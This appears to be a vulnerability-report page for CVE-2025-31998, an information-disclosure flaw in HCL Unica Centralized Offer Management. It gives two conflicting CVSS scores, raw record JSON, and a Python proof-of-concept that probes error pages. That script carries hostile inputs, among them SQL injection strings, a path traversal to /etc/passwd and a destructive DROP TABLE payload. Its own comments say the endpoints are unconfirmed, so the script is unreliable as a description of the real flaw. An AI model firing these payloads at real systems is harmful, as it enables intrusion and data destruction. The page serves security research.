Security Vulnerability Report
CVE-2025-31998 CVSS 3.5 LOW

CVE-2025-31998

Published: 2025-10-12 03:15:35
Last Modified: 2025-10-29 17:20:08

Description

HCL Unica Centralized Offer Management handles exceptions poorly, which exposes sensitive information. An attacker can use this information to exploit known vulnerabilities and launch targeted attacks, such as remote code execution or denial of service.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
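CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N
Note: this is the score from the metric entry typed "Secondary" in the raw JSON below. The same record also carries a "Primary" CVSS 3.1 entry scored 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), so the two assessments differ widely and the 3.5 headline should not be read as the only rating.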

Configurations (Affected Products)

cpe:2.3:a:hcltech:unica_centralized_offer_management:*:*:*:*:*:*:*:* - VULNERABLE
HCL Unica Centralized Offer Management (all unpatched versions; the CPE match in the raw JSON below lists versionEndExcluding 25.1.0.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
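# CVE-2025-31998 PoC - HCL Unica Centralized Offer Management Information Disclosure
# This PoC demonstrates how unhandled exceptions can leak sensitive information
#
# NOTE(review): the endpoint paths and parameter names used below are not
# confirmed by the CVE record or the vendor advisory referenced on this page;
# treat them as illustrative rather than as known-affected routes.
import requests
import sys

# Placeholders: set these to the instance under test and a valid session for it.
TARGET_URL = "https://target-hcl-unica.com"
AUTH_COOKIE = "JSESSIONID=YOUR_SESSION_ID"  # Requires low-privilege authentication

# Applied to every request so a stalled connection cannot hang the run.
_REQUEST_TIMEOUT = 10

# Substrings that commonly show up in verbose Java error pages. These are
# heuristics: several of them ("SQL", "database", "Exception", "/var/") also
# occur in ordinary page content, so every hit needs manual confirmation.
# ".do" was dropped from the original list because it is a URL suffix that
# appears in normal links and forms, not an error marker.
_ERROR_INDICATORS = (
    "stack trace", "Exception", "java.", "com.hcl",
    "SQL", "database", "NullPointer", "ClassCast",
    "NumberFormat", "FileNotFound", "/opt/", "/var/",
    "C:\\", "WEB-INF",
)


def trigger_exception(target_url, auth_cookie):
    """
    Send a fixed set of malformed requests and report verbose error output.

    Each request is issued with the supplied session cookie. The response
    body is searched case-insensitively for the substrings in
    ``_ERROR_INDICATORS``; every match is printed, followed by the first
    2000 characters of the body when at least one indicator matched.

    Args:
        target_url: Base URL of the instance under test (no trailing path).
        auth_cookie: Value for the ``Cookie`` request header.

    Returns:
        None. Results are written to stdout. Request failures are reported
        and the run continues with the next request.
    """
    headers = {
        "Cookie": auth_cookie,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    }

    # (method, url) pairs. The method is stated explicitly instead of being
    # inferred from an "api/v1" substring, which would misfire if the base
    # URL itself contained that text.
    requests_plan = [
        # 1: SQL-style boolean string in the id parameter
        ("GET", f"{target_url}/Campaign/centralizedOfferManagement.do?action=view&id=NULL'%20OR%201=1--"),
        # 2: path-traversal style string where an offer id is expected
        ("GET", f"{target_url}/Campaign/offer/listOffers.do?offerId=../../../../etc/passwd"),
        # 3: malformed JSON body sent to an API endpoint
        ("POST", f"{target_url}/api/v1/offers"),
        # 4: invalid date format intended to raise a parsing exception
        ("GET", f"{target_url}/Campaign/centralizedOfferManagement.do?startDate=INVALID_DATE_FORMAT"),
        # 5: SQL metacharacters in a search parameter.
        # NOTE(review): this string carries a DROP TABLE statement. That is not
        # needed to elicit an error page and would be destructive if the
        # parameter were ever passed to a database unescaped; prefer a
        # non-destructive malformed value when checking your own deployment.
        ("GET", f"{target_url}/Campaign/offer/search.do?query=';DROP%20TABLE%20users;--"),
    ]

    for i, (method, payload) in enumerate(requests_plan, 1):
        try:
            if method == "POST":
                # The original POST had no timeout and could block forever.
                response = requests.post(
                    payload,
                    headers={**headers, "Content-Type": "application/json"},
                    data='{"invalid": "json{{{',
                    timeout=_REQUEST_TIMEOUT,
                )
            else:
                response = requests.get(payload, headers=headers, timeout=_REQUEST_TIMEOUT)
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed for payload {i}: {e}")
            continue

        print(f"\n[+] Payload {i}: {payload}")
        print(f"[+] Status Code: {response.status_code}")

        # Lower-case once and collect the matches once, then reuse both.
        response_text = response.text.lower()
        hits = [ind for ind in _ERROR_INDICATORS if ind.lower() in response_text]

        for indicator in hits:
            print(f"[!] SENSITIVE INFO LEAKED: '{indicator}' found in response")

        # Show the leading part of the body so the match can be judged by hand.
        if hits:
            print(f"\n[*] Leaked Information:\n{response.text[:2000]}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]

    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] CVE-2025-31998 - HCL Unica Information Disclosure PoC")
    trigger_exception(TARGET_URL, AUTH_COOKIE)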

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31998", "sourceIdentifier": "[email protected]", "published": "2025-10-12T03:15:34.557", "lastModified": "2025-10-29T17:20:08.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Unica Centralized Offer Management is vulnerable to poor unhandled exceptions which exposes sensitive information. An attacker can exploit use this information to exploit known vulnerabilities launch targeted attacks, such as remote code execution or denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}, {"lang": "en", "value": "CWE-703"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:unica_centralized_offer_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.1.0.1", "matchCriteriaId": "5542E4D6-1B72-44F5-8CFF-D31D47444299"}]}]}], "references": [{"url": 
"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124422", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}